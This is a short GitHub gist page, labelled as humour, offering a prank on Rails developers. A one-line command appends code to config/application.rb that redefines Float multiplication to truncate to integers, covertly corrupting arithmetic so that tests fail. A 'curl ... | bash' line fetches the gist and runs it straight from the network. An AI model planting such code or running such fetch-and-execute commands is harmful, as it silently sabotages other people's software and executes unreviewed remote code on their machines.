Created
May 2, 2012 20:55
HUMOR: Have some fun with the Rails devs in your life, wreck Float#* and watch tests explode.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo 'class Float; def *(other); self.to_i * other.to_i; end; end;' >> config/application.rb |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
curl https://raw.github.com/gist/2580411 | bash